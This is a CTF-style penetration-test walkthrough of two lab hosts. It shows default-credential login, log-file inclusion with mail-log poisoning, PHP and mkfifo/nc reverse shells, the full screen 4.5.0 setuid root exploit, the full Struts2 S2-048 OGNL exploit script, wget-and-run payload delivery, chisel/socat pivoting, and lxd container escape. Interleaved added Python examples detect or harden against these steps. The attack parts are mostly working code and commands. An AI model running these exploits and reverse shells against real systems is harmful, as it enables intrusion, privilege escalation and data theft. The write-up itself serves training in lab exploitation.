Overview
Target 192.168.8.104
Information gathering
$ nmap 192.168.8.103 --min-rate 1000 -sC -sV
Result:
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 05:54 EDT
Nmap scan report for 192.168.8.103 (192.168.8.103)
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after: 2028-05-09T18:08:02
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open hadoop-datanode Apache Hadoop
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
|_http-trane-info: Problem with XML parsing of /evox/about
| hadoop-tasktracker-info:
|_ Logs: submit
| hadoop-datanode-info:
|_ Logs: submit
Service Info: Host: straylight
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
Visiting port 3000, we find an ntopng service.
ntopng is a high-performance network monitoring tool and traffic analysis platform. It provides a rich graphical user interface for monitoring network traffic in real time and analysing network behaviour. ntopng is the successor to the ntop project, with more features and better performance.
username:admin
password:admin
Logging into the back end with the default credentials, we find that port 80 also exposes a directory, turing-bolo:
http://192.168.8.103//turing-bolo/
Append each of the three files shown in the screenshot to the URL:
molly.log
armitage.log
riviera.log
http://192.168.8.103//turing-bolo/bolo.php?bolo=molly.log
When we strip the .log suffix:
http://192.168.8.103//turing-bolo/bolo.php?bolo=molly
So bolo.php appends .log to the supplied parameter and then includes that file.
The Nmap scan report shows the SMTP service is open, so a mail.log log file must exist in /var/log:
http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail
$ nc -nC 192.168.8.103 25
http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail
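The inclusion behaviour inferred above (parameter + ".log", included as-is) is what lets a log file outside the web root be pulled in. The following added example, which is not code from the original write-up and not the real bolo.php, models that resolver in Python beside a hardened allow-list version, and runs a small check over constructed Apache access-log lines to flag the request shapes used in this section. The document root path is an assumption.

```python
"""Vulnerable versus hardened handling of the bolo parameter, plus a scan of
access-log lines for the log-inclusion pattern. Added example, not code from
the original write-up; the document root and log lines are constructed."""
import os
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Hypothetical document root of the turing-bolo application (assumption).
DOCROOT = os.path.realpath("/var/www/html/turing-bolo")
# The three bolo names the page lists as valid.
ALLOWED_BOLOS = {"molly", "armitage", "riviera"}


def vulnerable_resolve(bolo: str) -> str:
    """What the write-up infers bolo.php does: append '.log' and include the
    result unchanged, so bolo=/var/log/mail resolves to /var/log/mail.log."""
    return bolo + ".log"


def hardened_resolve(bolo: str) -> Optional[str]:
    """Accept only the allow-listed names and confirm the final path stays
    inside DOCROOT. Returns None when the request must be rejected."""
    name = bolo[:-4] if bolo.endswith(".log") else bolo
    if name not in ALLOWED_BOLOS:
        return None
    path = os.path.realpath(os.path.join(DOCROOT, name + ".log"))
    if os.path.commonpath([DOCROOT, path]) != DOCROOT:
        return None
    return path


# Apache combined log format: client, identd, user, [time], "request", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def inspect_request(line: str) -> List[str]:
    """Return findings for one access-log line that targets bolo.php."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/bolo.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in params.get("bolo", []):
        name = value[:-4] if value.endswith(".log") else value
        if value.startswith("/") or ".." in value:
            findings.append("bolo points outside the application: %r" % value)
        elif name not in ALLOWED_BOLOS:
            findings.append("bolo not in allow-list: %r" % value)
    if "cmd" in params:
        # bolo.php takes no cmd parameter; its presence alongside a log path
        # is the signature of poisoned-log code execution.
        findings.append("unexpected cmd parameter on bolo.php")
    return findings


def scan(log_text: str) -> Dict[int, List[str]]:
    """Map 1-based line numbers to findings for every suspicious line."""
    hits: Dict[int, List[str]] = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        findings = inspect_request(line)
        if findings:
            hits[number] = findings
    return hits


# Constructed sample log lines in the shape of the requests made above.
SAMPLE_LOG = """\
192.168.8.107 - - [15/Jun/2024:05:58:01 -0400] "GET /turing-bolo/bolo.php?bolo=molly HTTP/1.1" 200 1420
192.168.8.107 - - [15/Jun/2024:05:59:12 -0400] "GET /turing-bolo/bolo.php?bolo=/var/log/mail HTTP/1.1" 200 8831
192.168.8.107 - - [15/Jun/2024:06:01:40 -0400] "GET /turing-bolo/bolo.php?cmd=id&bolo=/var/log/mail HTTP/1.1" 200 9020
192.168.8.107 - - [15/Jun/2024:06:02:03 -0400] "GET /index.html HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for number, findings in sorted(scan(SAMPLE_LOG).items()):
        print("line %d: %s" % (number, "; ".join(findings)))
```

The allow-list is the real fix: once the name must be one of three known values, the ".log" suffix trick and the absolute path both stop mattering. The log scan is the compensating control for hosts that still run the vulnerable version; a cmd parameter on a page that takes none, arriving together with a path into /var/log, is the sequence that this section's poisoning step produces.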
Get Shell
$ nc -lvnp 10032
http://192.168.8.103//turing-bolo/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=/var/log/mail
Local.txt screenshot
Local.txt contents
dainowandiawd
Privilege escalation
$ find / -perm -u=s -type f 2>/dev/null
We search for a privilege-escalation exploit:
$ searchsploit screen 4.5.0
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
char *const argv[] = {"/bin/sh", NULL};
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", argv);
}
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
$ cd /tmp
$ wget http://192.168.8.107/root.sh
$ chmod +x root.sh
$ ./root.sh
Proof.txt screenshot
Proof.txt contents
dainowandiawd
Target 192.168.28.4
Information gathering
A note in note.txt reads:
Devs,
Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.
The engineering team couldn't stress enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within our internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.
Anyways, we've deployed the war file on tomcat as ordered - located here:
/struts2_2.3.15.1-showcase
It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.
Regards,
Bob Laugh
Turing Systems Engineer II
The administrator seems to have deployed struts2_2.3.15.1, which looks risky.
Using arp we find other hosts on the LAN, so we need to pivot laterally:
./chisel server -p 2333 --socks5
./chisel client 192.168.8.103:2333 socks
Connect through proxychains to 127.0.0.1:1080 (run proxychains -h to find the location of its configuration file), then scan:
$ proxychains -f ./internal.conf nmap 192.168.28.4 --min-rate 1000 -Pn
$ proxychains -f ./internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV
Get Shell
Following the hint in the note, we visit the directory:
$ searchsploit struts2
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import requests


def exploit(url, cmd):
    print("[+] command: %s" % cmd)
    payload = "%{"
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
    payload += "}"
    data = {
        "name": payload,
        "age": 20,
        "__checkbox_bustedBefore": "true",
        "description": 1
    }
    headers = {
        'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
    }
    requests.post(url, data=data, headers=headers)


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("python %s <url> <cmd>" % sys.argv[0])
        sys.exit(0)
    print('[*] exploit Apache Struts2 S2-048')
    url = sys.argv[1]
    cmd = sys.argv[2]
    exploit(url, cmd)

# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
First, on host B, use socat to forward the port: listen locally on 10034 and forward the data to the Kali machine at 192.168.8.107:10034.
$ socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.28.3 10034 >/tmp/f
Save the above command as re.sh.
(Kali)$ python3 -m http.server 10034
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.28.3:10034/re.sh -O /tmp/re.sh"
(kali)$ nc -lvnp 10034
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/re.sh"
(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/re.sh"
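The S2-048 payload works because the name field is evaluated as an OGNL expression, and the script above shows exactly which constructs it needs: an expression opener, static member access, and tampering with the member-access sandbox. The following added example, which is neither the exploit script nor any part of Struts, is the kind of request-side check a reverse proxy or servlet filter can apply to form fields before they reach a vulnerable action. The sample submissions are constructed; the field names come from the form used above.

```python
"""Request-side detection of OGNL expression injection in Struts form fields.
Added example, not the exploit script above nor part of Struts; the sample
form submissions are constructed to mirror the saveGangster form fields."""
import re
from typing import Dict, List

# Markers of OGNL expression evaluation and sandbox tampering. A legitimate
# gangster name or description has no reason to contain any of them.
OGNL_INDICATORS = [
    ("expression_start", re.compile(r"[%$]\{")),
    ("static_access", re.compile(r"@[\w.]+@\w+")),  # @ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
    ("member_access", re.compile(r"#_memberAccess|setMemberAccess|DEFAULT_MEMBER_ACCESS", re.I)),
    ("exclusion_bypass", re.compile(r"getExcluded(PackageNames|Classes)\(\)\.clear\(\)")),
    ("process_execution", re.compile(r"java\.lang\.(Runtime|ProcessBuilder)")),
]

# The fields the saveGangster.action form accepts (from the page).
FORM_FIELDS = {"name", "age", "__checkbox_bustedBefore", "description"}


def ognl_indicators(value: str) -> List[str]:
    """Names of every indicator that matches a single field value."""
    return [name for name, pattern in OGNL_INDICATORS if pattern.search(value)]


def inspect_form(params: Dict[str, object]) -> Dict[str, List[str]]:
    """Map field name to indicators for each field that looks like OGNL."""
    findings = {}
    for field, value in params.items():
        hits = ognl_indicators(str(value))
        if hits:
            findings[field] = hits
    return findings


def should_block(params: Dict[str, object]) -> bool:
    """Block when a field opens an expression or touches the OGNL sandbox;
    a stray '@' pair in free text alone is not enough to reject the request."""
    decisive = {"expression_start", "member_access", "exclusion_bypass", "process_execution"}
    return any(decisive & set(hits) for hits in inspect_form(params).values())


# Constructed sample submissions (not captured traffic).
BENIGN_REQUEST = {
    "name": "Case",
    "age": 20,
    "__checkbox_bustedBefore": "true",
    "description": "console cowboy",
}
# Free text that trips only the weak indicator and must still pass.
EMAILISH_REQUEST = {"name": "wintermute@straylight", "age": 20, "description": "@tessier.ashpool@inc"}
# The opening of the payload built above, without the execution part.
INJECTION_REQUEST = {
    "name": "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm)}",
    "age": 20,
    "__checkbox_bustedBefore": "true",
    "description": 1,
}

if __name__ == "__main__":
    for label, request in (("benign", BENIGN_REQUEST), ("emailish", EMAILISH_REQUEST), ("injection", INJECTION_REQUEST)):
        print(label, should_block(request), inspect_form(request))
```

Indicator matching is a stop-gap. S2-048 exists because untrusted field input was passed as a raw message to ActionMessage and re-evaluated, so the lasting fix is to never feed user input into a message that Struts evaluates and to run a version in which the showcase action no longer does so.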
Local.txt screenshot
Local.txt contents
dwhai1d2
Privilege escalation
Because this connection is extremely unstable, we switch to SSH.
We check write permissions under the /home directory:
ta@neuromancer:/home$ for dir in /home/*/; do touch "$dir/1.txt"; done
We find that user ta can create files.
ta@neuromancer:/home$ ssh-keygen
ta@neuromancer:/home$ cat /home/ta/.ssh/id_rsa
ta@neuromancer:~/.ssh$ cat id_rsa.pub >authorized_keys
Copy the private key to Kali and save it as id_rsa.
(kali)$ chmod 400 id_rsa
However, the target's SSH service listens on port 34483.
(kali)$ proxychains -f internal.conf ssh -i id_rsa ta@192.168.28.4 -p 34483
We find that user ta belongs to the lxd group, which we can use for privilege escalation.
(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git
(kali)$ cd lxd-alpine-builder
Build the image:
(kali)$ sudo ./build-alpine
(192.168.8.103)$ socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &
(kali)$ python3 -m http.server 10035
ta@neuromancer:/tmp$ wget http://192.168.28.3:10035/alpine-v3.20-x86_64-20240613_1112.tar.gz -O /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz
ta@neuromancer:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz --alias test
ta@neuromancer:/tmp$ lxc image list
ta@neuromancer:/tmp$ lxc init test ignite -c security.privileged=true
lxc init myimage ignite: initialise a container named ignite from the myimage image.
-c security.privileged=true: configure the container as privileged. This means processes in the container run with root privileges and may directly access the host's devices and file system.
ta@neuromancer:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true
Choosing /mnt/root as the mount point keeps the mount safe, explicit and free of conflicts. In this way you can conveniently access and manipulate the host file system from inside the container, which is what makes the privilege escalation possible.
lxc config device add ignite mydevice disk: add a device named mydevice of type disk to the ignite container.
source=/: use the host's root directory / as the source.
path=/mnt/root: mount that directory at /mnt/root inside the container.
recursive=true: mount recursively, including subdirectories.
$ lxc start ignite
$ lxc exec ignite /bin/sh
Escape successful.
Proof.txt screenshot
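The escalation needs two things to be true at once: a non-root user in the lxd group, and a container configured with security.privileged=true plus a disk device whose source is the host's /. The following added example, which is not from the original write-up and not part of LXD, audits both from the defender's side. It parses constructed /etc/group lines and a constructed `lxc config show ignite` output in the key: value layout that command prints (the parser handles only that layout, not general YAML), and reports the settings explained above.

```python
"""Host-side audit for the two conditions the lxd escalation relies on: a
non-root user in a root-equivalent group, and a privileged container with
the host root mounted. Added example, not from the original write-up; the
/etc/group and `lxc config show` texts are constructed samples."""
from typing import Dict, List

# Group membership that lets a member reach root without sudo rules.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}


def users_in_root_equivalent_groups(group_text: str) -> Dict[str, List[str]]:
    """Parse /etc/group lines (name:pw:gid:members) and list members of the
    groups above; lines with no members are skipped."""
    found: Dict[str, List[str]] = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue
        name, members = parts[0], parts[3].strip()
        if name in ROOT_EQUIVALENT_GROUPS and members:
            found[name] = [m for m in members.split(",") if m]
    return found


def parse_lxc_config(text: str) -> dict:
    """Minimal parser for the indented key: value mappings that
    `lxc config show <container>` prints. Not a general YAML parser."""
    root: dict = {}
    stack = [(-1, root)]  # (indent, mapping) pairs, root never popped
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip().strip('"')
        while stack[-1][0] >= indent:
            stack.pop()
        parent = stack[-1][1]
        if value == "":
            parent[key] = {}  # "key:" with nothing after it opens a nested mapping
            stack.append((indent, parent[key]))
        else:
            parent[key] = value
    return root


def audit_container(config: dict) -> List[str]:
    """Findings for a parsed container config: privileged mode and any disk
    device that exposes the host root file system."""
    findings = []
    if config.get("config", {}).get("security.privileged") == "true":
        findings.append("security.privileged=true: root in the container is root on the host")
    for dev_name, dev in config.get("devices", {}).items():
        if isinstance(dev, dict) and dev.get("type") == "disk" and dev.get("source") == "/":
            findings.append("device %s mounts host / at %s" % (dev_name, dev.get("path")))
    return findings


# Constructed sample inputs (the host in the write-up has user ta in lxd).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:108:ta
ta:x:1000:
"""

SAMPLE_LXC_CONFIG = """\
architecture: x86_64
config:
  security.privileged: "true"
devices:
  test:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
name: ignite
"""

if __name__ == "__main__":
    print(users_in_root_equivalent_groups(SAMPLE_GROUP))
    for finding in audit_container(parse_lxc_config(SAMPLE_LXC_CONFIG)):
        print(finding)
```

On a real host you would feed it the actual /etc/group and the output of `lxc config show` for each container; the membership check is the one that matters most, because a user in lxd can create the privileged container and the disk device at will, so the fix is to remove such users from the group rather than to police container configs after the fact.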
Local.txt contents
diwoinwad